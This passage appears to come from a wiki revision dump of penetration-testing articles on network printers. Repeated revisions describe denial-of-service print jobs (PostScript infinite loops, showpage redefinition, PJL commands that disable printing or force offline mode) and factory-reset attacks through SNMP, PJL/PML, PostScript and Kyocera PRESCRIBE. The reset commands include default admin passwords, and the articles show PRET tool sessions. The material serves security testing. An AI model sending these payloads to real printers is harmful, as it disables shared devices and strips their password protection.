and restarted itself after about 10 minutes. The other devices did not accept print jobs anymore until the test was ultimately interrupted after half an hour. The malicious print job could in most cases manually be canceled from the control panel, while some devices required a manual restart. In contrast to blocking the [[transmission channel]], the connection can be closed immediately after the PostScript code has been sent. '''How to test for this attack?''' Use [[PRET]]'s ''hang'' command in ''ps'' mode: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> hang Warning: This command causes an infinite loop rendering the device useless until manual restart. Press CTRL+C to abort. Executing PostScript infinite loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Redefine showpage === Another approach is to permanently redefine PostScript operators as described in [[PostScript#Security features|security features]]. By setting ''showpage'' – which is used in every document to actually print the page – to do nothing at all, PostScript jobs are processed but not put to paper anymore. Example code is given below: <syntaxhighlight lang=postscript> true 0 startjob /showpage {} def </syntaxhighlight> '''How to test for this attack?''' Use [[PRET]]'s ''disable'' command in ''ps'' mode: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> disable Disabling printing functionality '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PJL == === PJL jobmedia === Proprietary PJL commands <ref>''[http://www.icareasc.com/ICareKM/University/TrainingMaterial/The%20German%20Laserweb/general/software-downloads/paperpathtest%20without%20paper.htm The German Laserweb Vers. 4.0: Test without Paper]'', ATS/GCC Team Germany</ref> can be used to set the older HP devices like the LaserJet 4k series into service mode and completely disable all printing functionality as shown below: @PJL SET SERVICEMODE=HPBOISEID @PJL DEFAULT JOBMEDIA=OFF '''How to test for this attack?''' Use [[PRET]]'s ''disable'' command in ''pjl'' mode: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> disable Printing functionality: OFF '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Offline mode === In addition, the PJL standard defines the ''OPMSG'' command which ‘prompts the printer to display a specified message and go offline’ \cite{hp1997pjl}. This can be used to simulate a paper jam as shown in below: @PJL OPMSG DISPLAY="PAPER JAM IN ALL DOORS" The command is supported by various printer models of different manufacturers. The device can however be easily brought to accept jobs again by manually pressing the ''online'' button on the control panel. '''How to test for this attack?''' Use [[PRET]]'s ''offline'' command in ''pjl'' mode: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> offline "MESSAGE TO DSIPLAY" Warning: Taking the printer offline will prevent yourself and others from printing or re-connecting to the device. Press CTRL+C to abort. Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM! '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 9df80d3dada2b91f8738dd511df6454ed8aea289 304 224 2017-01-31T08:07:57Z 84.153.135.37 0 wikitext text/x-wiki Page description languages allowing infinite loops or calculations that require a lot of computing time can be abused to keep the printer's [https://en.wikipedia.org/wiki/Raster_image_processor RIP] busy. Examples of this are complex [https://en.wikipedia.org/wiki/HPGL HP-GL] calculations and [[PostScript]] programs. Even minimalist languages like [[PCL]] can be used to upload permanent macros or fonts until the available memory is consumed. [[PJL]] on HP devices has undocumented features to completely disable further printing functionality. In this article, various practical approaches of malicious print jobs which lead to denial of service are discussed. == PostScript == === Infinite loops === One trivial example of an infinite loop written in PostScript is given below: <syntaxhighlight lang=postscript> %! {} loop </syntaxhighlight> This minimalist document keeps a PostScript interpreter busy forever. In an evalation with a pool of 20 test printers, only one had a watchdog mechanism and restarted itself after about 10 minutes. The other devices did not accept print jobs anymore until the test was ultimately interrupted after half an hour. The malicious print job could in most cases manually be canceled from the control panel while some devices required a manual restart. In contrast to blocking the [[transmission channel]], the connection can be closed immediately after the PostScript code has been sent. '''How to test for this attack?''' Use [[PRET]]'s ''hang'' command in ''ps'' mode: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> hang Warning: This command causes an infinite loop rendering the device useless until manual restart. Press CTRL+C to abort. Executing PostScript infinite loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Redefine showpage === Another approach is to permanently redefine PostScript operators as described in [[PostScript#Security features|security features]]. By setting ''showpage'' – which is used in every document to actually print the page – to do nothing at all, PostScript jobs are processed but not put to paper anymore. Example code is given below: <syntaxhighlight lang=postscript> true 0 startjob /showpage {} def </syntaxhighlight> '''How to test for this attack?''' Use [[PRET]]'s ''disable'' command in ''ps'' mode: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> disable Disabling printing functionality '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PJL == === PJL jobmedia === Proprietary PJL commands <ref>''[http://www.icareasc.com/ICareKM/University/TrainingMaterial/The%20German%20Laserweb/general/software-downloads/paperpathtest%20without%20paper.htm The German Laserweb Vers. 4.0: Test without Paper]'', ATS/GCC Team Germany</ref> can be used to set the older HP devices like the LaserJet 4k series into service mode and completely disable all printing functionality as shown below: @PJL SET SERVICEMODE=HPBOISEID @PJL DEFAULT JOBMEDIA=OFF '''How to test for this attack?''' Use [[PRET]]'s ''disable'' command in ''pjl'' mode: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> disable Printing functionality: OFF '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Offline mode === In addition, the PJL standard defines the ''OPMSG'' command which ‘prompts the printer to display a specified message and go offline’ \cite{hp1997pjl}. This can be used to simulate a paper jam as shown in below: @PJL OPMSG DISPLAY="PAPER JAM IN ALL DOORS" The command is supported by various printer models of different manufacturers. The device can however be easily brought to accept jobs again by manually pressing the ''online'' button on the control panel. '''How to test for this attack?''' Use [[PRET]]'s ''offline'' command in ''pjl'' mode: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> offline "MESSAGE TO DSIPLAY" Warning: Taking the printer offline will prevent yourself and others from printing or re-connecting to the device. Press CTRL+C to abort. Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM! '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 0552ab7ec43ffa83e8f1bdac2e7321711b53ea11 224 209 2017-01-23T19:48:51Z Admin 1 wikitext text/x-wiki Page description languages allowing infinite loops or calculations that require a lot of computing time can be abused to keep the printer's [https://en.wikipedia.org/wiki/Raster_image_processor RIP] busy. Examples of this are complex [https://en.wikipedia.org/wiki/HPGL HP-GL] calculations and [[PostScript]] programs. Even minimalist languages like [[PCL]], can be used to upload permanent marcos or fonts, until the available memory is consumed. [[PJL]] on HP devices has undocumented features to completely disable further printing functionality. In this article, various practical approaches of malicious print jobs which lead to denial of service are discussed. == PostScript == === Infinite loops === One trivial example of an infinite loop written in PostScript is given below: <syntaxhighlight lang=postscript> %! {} loop </syntaxhighlight> This minimalist document keeps a PostScript interpreter busy forever. In an evalation with a pool of 20 test printers, only one had a watchdog mechanism and restarted itself after about 10 minutes. The other devices did not accept print jobs anymore until the test was ultimately interrupted after half an hour. The malicious print job could in most cases manually be canceled from the control panel while some devices required a manual restart. In contrast to blocking the [[transmission channel]], the connection can be closed immediately after the PostScript code has been sent. '''How to test for this attack?''' Use [[PRET]]'s ''hang'' command in ''ps'' mode: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> hang Warning: This command causes an infinite loop rendering the device useless until manual restart. Press CTRL+C to abort. Executing PostScript infinite loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Redefine showpage === Another approach is to permanently redefine PostScript operators as described in [[PostScript#Security features|security features]]. By setting ''showpage'' – which is used in every document to actually print the page – to do nothing at all, PostScript jobs are processed but not put to paper anymore. Example code is given below: <syntaxhighlight lang=postscript> true 0 startjob /showpage {} def </syntaxhighlight> '''How to test for this attack?''' Use [[PRET]]'s ''disable'' command in ''ps'' mode: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> disable Disabling printing functionality '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PJL == === PJL jobmedia === Proprietary PJL commands <ref>''[http://www.icareasc.com/ICareKM/University/TrainingMaterial/The%20German%20Laserweb/general/software-downloads/paperpathtest%20without%20paper.htm The German Laserweb Vers. 4.0: Test without Paper]'', ATS/GCC Team Germany</ref> can be used to set the older HP devices like the LaserJet 4k series into service mode and completely disable all printing functionality as shown below: @PJL SET SERVICEMODE=HPBOISEID @PJL DEFAULT JOBMEDIA=OFF '''How to test for this attack?''' Use [[PRET]]'s ''disable'' command in ''pjl'' mode: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> disable Printing functionality: OFF '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Offline mode === In addition, the PJL standard defines the ''OPMSG'' command which ‘prompts the printer to display a specified message and go offline’ \cite{hp1997pjl}. This can be used to simulate a paper jam as shown in below: @PJL OPMSG DISPLAY="PAPER JAM IN ALL DOORS" The command is supported by various printer models of different manufacturers. The device can however be easily brought to accept jobs again by manually pressing the ''online'' button on the control panel. '''How to test for this attack?''' Use [[PRET]]'s ''offline'' command in ''pjl'' mode: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> offline "MESSAGE TO DSIPLAY" Warning: Taking the printer offline will prevent yourself and others from printing or re-connecting to the device. Press CTRL+C to abort. Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM! '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- fd4d37fd1b424c0743e226a8a856706bd475dd7c 209 186 2017-01-23T16:37:13Z Admin 1 /* Showpage redefinition */ wikitext text/x-wiki Page description languages allowing infinite loops or calculations that require a lot of computing time can be abused to keep the printer's [https://en.wikipedia.org/wiki/Raster_image_processor RIP] busy. Examples of this are complex [https://en.wikipedia.org/wiki/HPGL HP-GL] calculations and [[PostScript]] programs. Even minimalist languages like [[PCL]], can be used to upload permanent marcos or fonts, until the available memory is consumed. [[PJL]] on HP devices has undocumented features to completely disable further printing functionality. In this article, various practical approaches of malicious print jobs which lead to denial of service are discussed. == PostScript == === Infinite loops === One trivial example of an infinite loop written in PostScript is given below: <syntaxhighlight lang=postscript> %! {} loop </syntaxhighlight> This minimalist document keeps a PostScript interpreter busy forever. In an evalation with a pool of 20 test printers, only one had a watchdog mechanism and restarted itself after about 10 minutes. The other devices did not accept print jobs anymore until the test was ultimately interrupted after half an hour. The malicious print job could in most cases manually be canceled from the control panel while some devices required a manual restart. In contrast to blocking the [[transmission channel]], the connection can be closed immediately after the PostScript code has been sent. '''How to test for this attack?''' Use [[PRET]]'s ''hang'' command in ''ps'' mode: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> hang Warning: This command causes an infinite loop rendering the device useless until manual restart. Press CTRL+C to abort. Executing PostScript infinite loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Redefine showpage === Another approach is to permanently redefine PostScript operators as described in [[PostScript#Security features|security features]]. By setting ''showpage'' – which is used in every document to actually print the page – to do nothing at all, PostScript jobs are processed but not put to paper anymore. Example code is given below: <syntaxhighlight lang=postscript> true 0 startjob /showpage {} def </syntaxhighlight> '''How to test for this attack?''' Use [[PRET]]'s ''disable'' command in ''ps'' mode: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> disable Disabling printing functionality '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PJL == === PJL jobmedia === Proprietary PJL commands <ref>''[http://www.icareasc.com/ICareKM/University/TrainingMaterial/The%20German%20Laserweb/general/software-downloads/paperpathtest%20without%20paper.htm The German Laserweb Vers. 4.0: Test without Paper]'', ATS/GCC Team Germany</ref> can be used to set the older HP devices like the LaserJet 4X series into service mode and completely disable all printing functionality as shown below: @PJL SET SERVICEMODE=HPBOISEID @PJL DEFAULT JOBMEDIA=OFF '''How to test for this attack?''' Use [[PRET]]'s ''disable'' command in ''pjl'' mode: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> disable Printing functionality: OFF '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Offline mode === In addition, the PJL standard defines the ''OPMSG'' command which ‘prompts the printer to display a specified message and go offline’ \cite{hp1997pjl}. This can be used to simulate a paper jam as shown in below: @PJL OPMSG DISPLAY="PAPER JAM IN ALL DOORS" The command is supported by various printer models of different manufacturers. The device can however be easily brought to accept jobs again by manually pressing the ''online'' button on the control panel. '''How to test for this attack?''' Use [[PRET]]'s ''offline'' command in ''pjl'' mode: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> offline "MESSAGE TO DSIPLAY" Warning: Taking the printer offline will prevent yourself and others from printing or re-connecting to the device. Press CTRL+C to abort. Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM! '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- f361864fae449aa9f35d457ec41fea5dac404049 186 2017-01-22T10:43:31Z Admin 1 Created page with "Page description languages allowing infinite loops or calculations that require a lot of computing time can be abused to keep the printer's [https://en.wikipedia.org/wiki/Rast..." wikitext text/x-wiki Page description languages allowing infinite loops or calculations that require a lot of computing time can be abused to keep the printer's [https://en.wikipedia.org/wiki/Raster_image_processor RIP] busy. Examples of this are complex [https://en.wikipedia.org/wiki/HPGL HP-GL] calculations and [[PostScript]] programs. Even minimalist languages like [[PCL]], can be used to upload permanent marcos or fonts, until the available memory is consumed. [[PJL]] on HP devices has undocumented features to completely disable further printing functionality. In this article, various practical approaches of malicious print jobs which lead to denial of service are discussed. == PostScript == === Infinite loops === One trivial example of an infinite loop written in PostScript is given below: <syntaxhighlight lang=postscript> %! {} loop </syntaxhighlight> This minimalist document keeps a PostScript interpreter busy forever. In an evalation with a pool of 20 test printers, only one had a watchdog mechanism and restarted itself after about 10 minutes. The other devices did not accept print jobs anymore until the test was ultimately interrupted after half an hour. The malicious print job could in most cases manually be canceled from the control panel while some devices required a manual restart. In contrast to blocking the [[transmission channel]], the connection can be closed immediately after the PostScript code has been sent. '''How to test for this attack?''' Use [[PRET]]'s ''hang'' command in ''ps'' mode: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> hang Warning: This command causes an infinite loop rendering the device useless until manual restart. Press CTRL+C to abort. Executing PostScript infinite loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Showpage redefinition === Another approach is to permanently redefine PostScript operators. By setting ''showpage'' – which is used in every document to actually print the page – to do nothing at all, PostScript jobs are processed but not put to paper anymore. Example code is given below: <syntaxhighlight lang=postscript> true 0 startjob /showpage {} def </syntaxhighlight> '''How to test for this attack?''' Use [[PRET]]'s ''disable'' command in ''ps'' mode: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> disable Disabling printing functionality '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PJL == === PJL jobmedia === Proprietary PJL commands <ref>''[http://www.icareasc.com/ICareKM/University/TrainingMaterial/The%20German%20Laserweb/general/software-downloads/paperpathtest%20without%20paper.htm The German Laserweb Vers. 4.0: Test without Paper]'', ATS/GCC Team Germany</ref> can be used to set the older HP devices like the LaserJet 4X series into service mode and completely disable all printing functionality as shown below: @PJL SET SERVICEMODE=HPBOISEID @PJL DEFAULT JOBMEDIA=OFF '''How to test for this attack?''' Use [[PRET]]'s ''disable'' command in ''pjl'' mode: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> disable Printing functionality: OFF '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Offline mode === In addition, the PJL standard defines the ''OPMSG'' command which ‘prompts the printer to display a specified message and go offline’ \cite{hp1997pjl}. This can be used to simulate a paper jam as shown in below: @PJL OPMSG DISPLAY="PAPER JAM IN ALL DOORS" The command is supported by various printer models of different manufacturers. The device can however be easily brought to accept jobs again by manually pressing the ''online'' button on the control panel. '''How to test for this attack?''' Use [[PRET]]'s ''offline'' command in ''pjl'' mode: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> offline "MESSAGE TO DSIPLAY" Warning: Taking the printer offline will prevent yourself and others from printing or re-connecting to the device. Press CTRL+C to abort. Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM! '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 5fe310455daf415663129dfbaa8879cdbba23f71 0 32 633 632 2017-06-25T11:29:36Z Admin 1 /* PostScript */ wikitext text/x-wiki Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question comes up, if printer vendors have implemented the possibility to perform factory resets on-line using printer control or page description languages. They have, as discussed in this article. == SNMP == The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all static IP address configuration will be lost. If no [https://de.wikipedia.org/wiki/Dynamic_Host_Configuration_Protocol DHCP] service is available, the attacker will not be able to reconnect to the device anymore after resetting it to factory defaults. '''How to test for this attack?''' Resetting the device to factory default can be accomplished using ''snmpset'' command as shown below: <syntaxhighlight lang=sh> snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6 </syntaxhighlight> '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. == PML/PJL == In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, SNMP can be transformed into its [[PML]] representation and embed the request within a legitimate print job. This allows an attacker to restart and/or reset the device to factory defaults within ordinary print jobs as shown below: @PJL DMCMD ASCIIHEX="040006020501010301040106" '''How to test for this attack?''' On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript == PostScript offers a similar feature: The ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer on the other hand can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment but it requires a [[Credential disclosure|valid password]]. The PostScript interpreter however can be put into an infinite loop as discussed in [[document processing]] DoS attacks which forces the user to manually restart the device and thus reset the PostScript password. Reset PostScript system parameters to factory defaults: <syntaxhighlight lang=postscript> << /FactoryDefaults true >> setsystemparams </syntaxhighlight> Restart the PostScript interpreter and virtual memory: <syntaxhighlight lang=postscript> true 0 startjob systemdict /quit get exec </syntaxhighlight> '''How to test for this attack?''' Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PRESCRIBE == For Kyocera devices, the PRESCRIBE page description languages may be used to reset the device to factory default from within ordinary print jobs using one of the commands shown below: <!-- may autorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; --> !R! KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password"; !R! ACNT "REST"; CMMT "Reset account code admin password"; !R! EGRE; CMMT "Reset the engine board to factory defaults"; !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings"; '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the commands documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 181d55aaa80f68962f31fbbc316404ae071f60dc 632 631 2017-06-25T11:28:29Z Admin 1 /* PostScript */ wikitext text/x-wiki Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question comes up, if printer vendors have implemented the possibility to perform factory resets on-line using printer control or page description languages. They have, as discussed in this article. == SNMP == The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all static IP address configuration will be lost. If no [https://de.wikipedia.org/wiki/Dynamic_Host_Configuration_Protocol DHCP] service is available, the attacker will not be able to reconnect to the device anymore after resetting it to factory defaults. '''How to test for this attack?''' Resetting the device to factory default can be accomplished using ''snmpset'' command as shown below: <syntaxhighlight lang=sh> snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6 </syntaxhighlight> '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. == PML/PJL == In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, SNMP can be transformed into its [[PML]] representation and embed the request within a legitimate print job. This allows an attacker to restart and/or reset the device to factory defaults within ordinary print jobs as shown below: @PJL DMCMD ASCIIHEX="040006020501010301040106" '''How to test for this attack?''' On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript == PostScript offers a similar feature: The ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer on the other hand can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment but it requires a [[Credential disclosure|valid password]]. The PostScript interpreter however can be put into an infinite loop as discussed in [[transmission channel]] which forces the user to manually restart the device and thus reset the PostScript password. Reset PostScript system parameters to factory defaults: <syntaxhighlight lang=postscript> << /FactoryDefaults true >> setsystemparams </syntaxhighlight> Restart the PostScript interpreter and virtual memory: <syntaxhighlight lang=postscript> true 0 startjob systemdict /quit get exec </syntaxhighlight> '''How to test for this attack?''' Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PRESCRIBE == For Kyocera devices, the PRESCRIBE page description languages may be used to reset the device to factory default from within ordinary print jobs using one of the commands shown below: <!-- may autorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; --> !R! KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password"; !R! ACNT "REST"; CMMT "Reset account code admin password"; !R! EGRE; CMMT "Reset the engine board to factory defaults"; !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings"; '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the commands documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 1dfcabbd5adc06c01d37cd0ec33ff851d216ffbd 631 630 2017-06-25T11:26:18Z Admin 1 wikitext text/x-wiki Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question comes up, if printer vendors have implemented the possibility to perform factory resets on-line using printer control or page description languages. They have, as discussed in this article. == SNMP == The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all static IP address configuration will be lost. If no [https://de.wikipedia.org/wiki/Dynamic_Host_Configuration_Protocol DHCP] service is available, the attacker will not be able to reconnect to the device anymore after resetting it to factory defaults. '''How to test for this attack?''' Resetting the device to factory default can be accomplished using ''snmpset'' command as shown below: <syntaxhighlight lang=sh> snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6 </syntaxhighlight> '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. == PML/PJL == In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, SNMP can be transformed into its [[PML]] representation and embed the request within a legitimate print job. This allows an attacker to restart and/or reset the device to factory defaults within ordinary print jobs as shown below: @PJL DMCMD ASCIIHEX="040006020501010301040106" '''How to test for this attack?''' On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript == PostScript offers a similar feature: The ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer on the other hand can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment but it requires a [[Credential disclosure|valid password]]. The PostScript interpreter however can be put into an infinite loop as discussed in [[eval-transmission-channel]] which forces the user to manually restart the device and thus reset the PostScript password. Reset PostScript system parameters to factory defaults: <syntaxhighlight lang=postscript> << /FactoryDefaults true >> setsystemparams </syntaxhighlight> Restart the PostScript interpreter and virtual memory: <syntaxhighlight lang=postscript> true 0 startjob systemdict /quit get exec </syntaxhighlight> '''How to test for this attack?''' Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PRESCRIBE == For Kyocera devices, the PRESCRIBE page description languages may be used to reset the device to factory default from within ordinary print jobs using one of the commands shown below: <!-- may autorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; --> !R! KSUS 